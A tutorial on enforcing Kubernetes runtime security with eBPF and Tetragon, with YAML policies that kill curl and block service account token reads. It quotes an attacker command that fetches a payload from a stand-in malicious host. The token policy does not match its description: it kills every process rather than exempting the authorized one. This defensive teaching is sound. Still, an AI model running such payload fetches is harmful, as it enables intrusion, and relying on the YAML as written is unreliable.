Securing Kubernetes at Runtime: Real-Time Enforcement with eBPF and Tetragon

Beyond Passive Monitoring: The Case for Runtime Enforcement

For years, the standard approach to Kubernetes security has followed a familiar pattern: scan images in the CI/CD pipeline, harden configurations using OPA or Kyverno, and monitor logs for suspicious activity. While 'shifting left' is essential, it assumes that we can predict every vulnerability and that our configurations are foolproof. The reality is that zero-day exploits, supply chain attacks, and sophisticated lateral movement often happen in the 'runtime'—the period after a container has successfully passed all checks and is running in production.

Traditional runtime security tools often rely on sidecars or ptrace-based debugging, which introduce significant performance overhead and can be bypassed by sophisticated attackers. More importantly, most of these tools are reactive; they generate an alert after a malicious script has already executed or a sensitive file has been exfiltrated.

To achieve true resilience, we need to move from detection to real-time enforcement. This is where eBPF (Extended Berkeley Packet Filter) and Tetragon come into play. By operating at the kernel level, we can stop malicious actions before they complete, rather than just writing a post-mortem about them.

Why eBPF is the Foundation of Modern Security

eBPF has fundamentally changed how we observe and secure the Linux kernel. In simple terms, eBPF allows us to run sandboxed programs within the kernel without changing kernel source code or loading risky modules.

From a security perspective, eBPF provides deep visibility into every system call (syscall), network packet, and file operation. Because it sits between the user-space applications and the hardware, it has a vantage point that is impossible to evade from within a container. If a process wants to open a socket, execute a binary, or read /etc/shadow, it must go through the kernel. eBPF hooks into these execution points, allowing us to inspect the context and—crucially—decide whether to allow the action to proceed.

Introducing Tetragon

Tetragon is an open-source project from the Cilium community designed specifically for eBPF-based security observability and runtime enforcement. While tools like Falco are excellent at detecting and alerting on events, Tetragon’s superpower is its ability to perform in-kernel filtering and enforcement.

Instead of sending every event to a user-space daemon to decide what to do (which introduces latency), Tetragon can be configured to take action directly in the kernel. This allows for 'sigkill' capabilities: the ability to terminate a process the millisecond it attempts an unauthorized action, such as executing curl in a production pod where it doesn't belong.

Core Components of Tetragon

The Tetragon Agent: Runs as a DaemonSet on every node in your Kubernetes cluster.
eBPF Programs: These are loaded by the agent into the kernel to monitor specific hooks (kprobes, tracepoints, LSM hooks).
TracingPolicy: A Custom Resource Definition (CRD) that allows you to define what to monitor and what actions to take using standard Kubernetes YAML syntax.

Practical Implementation: Blocking Malicious Execution

Let’s walk through a real-world scenario. Suppose you have a microservice that should never need to use network tools like curl, wget, or netcat. If an attacker gains shell access via an RCE (Remote Code Execution) vulnerability, their first step is usually to download a second-stage payload using one of these tools.

Step 1: Installing Tetragon

Installing Tetragon is straightforward via Helm. It is recommended to run it in its own namespace:

helm repo add cilium https://helm.cilium.io
helm install tetragon cilium/tetragon -n kube-system

Once running, Tetragon immediately begins auditing process executions, which you can observe by tailing the logs of the Tetragon pods or using the tetra CLI tool.

Step 2: Defining an Enforcement Policy

To move from auditing to enforcement, we define a TracingPolicy. The following policy targets pods with the label app: secure-api and prevents the execution of /usr/bin/curl.

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "block-curl-execution"
spec:
  kprobes:
  - call: "security_bprm_check_security"
    syscall: false
    args:
    - index: 0
      type: "linux_binprm"
    selectors:
    - matchPIDs:
      - operator: In
        followForks: true
        isRoot: false
      matchBinaries:
      - operator: "In"
        values:
        - "/usr/bin/curl"
      matchArgs:
      - index: 0
        operator: "Prefix"
        values:
        - "/usr/bin/curl"
      matchActions:
      - action: Sigkill

How This Policy Works

Hook Point: We are hooking into security_bprm_check_security. This is a Linux Security Module (LSM) hook that triggers right before a new program is executed.
Selectors: We filter for processes where the binary path matches /usr/bin/curl.
Action: Instead of just logging, we specify Sigkill. The kernel will send a SIGKILL signal to the process before it even starts its first instruction.

When an attacker tries to run curl http://malicious-site.com/exploit.sh, the process will be terminated instantly. To the attacker, it looks like the command simply failed to start; to the administrator, a structured JSON log entry is generated detailing exactly who, where, and when the violation occurred.

Deep Dive: Restricting File Access

Execution isn't the only thing we should monitor. Unauthorized access to sensitive files—like Kubernetes ServiceAccount tokens or /etc/shadow—is a hallmark of container escape attempts.

We can use Tetragon to monitor and block access to specific file paths. Consider this policy that blocks any process from reading the service account token unless it is the authorized application process:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "protect-service-account-tokens"
spec:
  kprobes:
  - call: "fd_install"
    syscall: false
    args:
    - index: 1
      type: "file"
    selectors:
    - matchArgs:
      - index: 1
        operator: "Prefix"
        values:
        - "/var/run/secrets/kubernetes.io/serviceaccount/token"
      matchActions:
      - action: Sigkill

By hooking into fd_install (the kernel function that associates a file descriptor with a file), we can intercept the attempt to open the token file and kill the process if it doesn't meet our criteria.

Observability: The 'tetra' CLI

While YAML defines the rules, the tetra CLI provides the visibility. It allows you to see the real-time stream of events in a human-readable format. For example, to see all process executions across the cluster:

kubectl logs -n kube-system -l app.kubernetes.io/name=tetragon -c export-stdout -f | tetra getevents -o compact

This visibility is crucial during the initial rollout. A senior engineer should always run Tetragon in Audit mode (without the Sigkill action) for several days to establish a baseline of legitimate behavior before switching to enforcement.

Performance and Operational Considerations

One of the most frequent questions regarding runtime security is the performance hit. Traditional tools that use ptrace or user-space filtering can see overhead between 10% and 30% because every system call requires a context switch from kernel-space to user-space and back.

Because Tetragon does the filtering in the kernel using eBPF, the overhead is negligible—often less than 1-2%. The kernel only sends data to the user-space agent when a policy match occurs, drastically reducing the volume of data crossing the kernel/user-space boundary.

However, there are trade-offs to consider:

Kernel Version Requirements: eBPF features are tied to the Linux kernel version. To use advanced enforcement features like LSM hooks, you generally need a modern kernel (5.7 or newer). Most managed Kubernetes services (GKE, EKS, AKS) now provide nodes that meet these requirements.
Complexity of Rules: Writing eBPF tracing policies requires a deeper understanding of Linux internals than writing standard K8s Network Policies. You need to know which kernel functions (kprobes) correspond to the actions you want to restrict.
Blast Radius: A poorly written policy with a Sigkill action could accidentally take down legitimate production services. Rigorous testing in staging is non-negotiable.

Tetragon vs. Falco: Choosing the Right Tool

It is common to compare Tetragon with Falco, the CNCF graduated project.

Falco is primarily a detection engine. It excels at complex rule sets and has a vast library of pre-built macros for detecting common attack patterns. It is fantastic for compliance and auditing.
Tetragon is an enforcement engine. While it provides excellent observability, its primary value proposition is the ability to stop the attack in its tracks at the kernel level.

In many high-security environments, engineers use both: Falco for broad-spectrum detection and alerting, and Tetragon for surgical, high-confidence enforcement of critical boundaries.

Conclusion: Your Action Plan

Runtime security is no longer an optional layer for organizations running sensitive workloads in Kubernetes. Relying solely on static analysis leaves a gap that attackers are more than happy to exploit. By leveraging eBPF and Tetragon, you can implement a "Zero Trust" model at the process level.

To get started, follow these three steps:

Deploy Tetragon in Audit Mode: Install the agent and monitor the default events to understand the normal process lifecycle of your applications.
Identify High-Risk Binaries: Determine which tools (like curl, apt, capsh) are present in your images but should never be executed in production.
Implement Incremental Enforcement: Start by applying Sigkill policies to non-critical internal tools in a staging environment, then gradually roll out to production once you have verified there are no false positives.

By moving enforcement into the kernel, you aren't just watching your cluster—you're actively defending it.